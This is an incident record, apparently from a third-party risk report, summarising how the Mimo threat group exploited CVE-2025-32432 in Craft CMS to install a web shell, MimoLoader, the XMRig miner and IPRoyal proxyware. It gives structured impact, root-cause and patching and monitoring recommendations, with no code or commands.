The Mimo threat group exploited a maximum-severity vulnerability (CVE-2025-32432) in Craft CMS to deploy MimoLoader, a malicious payload distributing cryptocurrency mining malware (XMRig) and residential proxyware (IPRoyal). The attack began with initial access via a Turkish IP address, where threat actors installed a web shell to execute persistence scripts. These scripts terminated existing XMRig processes before deploying the Mimo Loader, which then injected both the cryptocurrency miner and proxyware onto compromised systems.The rapid weaponization of CVE-2025-32432—from disclosure to active exploitation—demonstrates Mimo’s high operational agility. While the primary impact involves unauthorized resource consumption (CPU/memory for mining) and proxy network abuse, the breach also risks further lateral movement if left unchecked. Organizations using Craft CMS face operational disruption, reputational damage, and potential financial losses from cryptojacking. The attack does not explicitly mention data exfiltration or ransomware, but the persistence mechanisms suggest long-term compromise risks.
Source: https://www.scworld.com/brief/craft-cms-exploit-facilitates-multiple-payload-delivery
TPRM report: https://www.rankiteo.com/company/craftcms
"id": "cra4550545113025",
"linkid": "craftcms",
"type": "Cyber Attack",
"date": "5/2025",
"severity": "60",
"impact": "2",
"explanation": "Attack limited on finance or reputation"{'affected_entities': [{'type': ['organizations using Craft CMS']}],
'attack_vector': ['exploitation of CVE-2025-32432 (Craft CMS vulnerability)',
'web shell deployment',
'persistence script execution',
'malware injection (MimoLoader, XMRig, IPRoyal)'],
'description': 'Intrusions abusing the maximum severity Craft CMS '
'vulnerability (CVE-2025-32432) have been launched by the Mimo '
'threat operation to distribute the MimoLoader alongside '
'cryptocurrency mining malware (XMRig) and residential '
'proxyware (IPRoyal). Initial access was facilitated by '
'exploiting the vulnerability from a Turkish IP address, '
'allowing Mimo to deploy a web shell that executes a '
'persistence shell script. This script terminates active XMRig '
'processes before deploying MimoLoader, which then injects '
'XMRig and IPRoyal proxyware. The threat actor remains active, '
'demonstrating high responsiveness in exploiting newly '
'disclosed vulnerabilities.',
'impact': {'brand_reputation_impact': ['potential reputational damage due to '
'compromise and malware deployment'],
'operational_impact': ['potential system performance degradation '
'due to cryptocurrency mining',
'unauthorized proxyware (IPRoyal) usage']},
'initial_access_broker': {'backdoors_established': ['web shell deployment'],
'entry_point': ['exploitation of CVE-2025-32432 '
'(Craft CMS vulnerability)']},
'investigation_status': 'ongoing',
'lessons_learned': ['Threat actors like Mimo demonstrate rapid adoption of '
'newly disclosed vulnerabilities, emphasizing the need '
'for immediate patching. Exploitation of CMS '
'vulnerabilities can lead to multi-stage attacks, '
'including cryptojacking and proxyware deployment. '
'Persistence mechanisms (e.g., web shells and scripts) '
'are commonly used to maintain access and evade '
'detection.'],
'motivation': ['financial gain (cryptocurrency mining)',
'proxyware deployment for residential IP exploitation',
'opportunistic exploitation of newly disclosed '
'vulnerabilities'],
'post_incident_analysis': {'root_causes': ['unpatched Craft CMS vulnerability '
'(CVE-2025-32432)',
'lack of detection for initial '
'exploitation and '
'post-exploitation activities '
'(e.g., web shell, persistence '
'scripts)']},
'recommendations': ['Immediately patch Craft CMS installations to mitigate '
'CVE-2025-32432.',
'Monitor systems for unauthorized cryptocurrency mining '
'activity (e.g., XMRig processes).',
'Inspect networks for signs of proxyware (e.g., IPRoyal) '
'and unauthorized traffic routing.',
'Deploy behavioral detection mechanisms to identify web '
'shell and persistence script activities.',
'Conduct regular vulnerability assessments to identify '
'and remediate exposed services.'],
'references': [{'source': 'The Hacker News'}, {'source': 'Sekoia.io'}],
'response': {'third_party_assistance': ['Sekoia.io (analysis)']},
'threat_actor': 'Mimo',
'title': 'Exploitation of CVE-2025-32432 in Craft CMS by Mimo Threat '
'Operation to Distribute MimoLoader, Cryptocurrency Mining Malware, '
'and Proxyware',
'type': ['cyberattack',
'exploitation of vulnerability',
'malware distribution',
'cryptojacking',
'proxyware deployment'],
'vulnerability_exploited': 'CVE-2025-32432 (Craft CMS)'}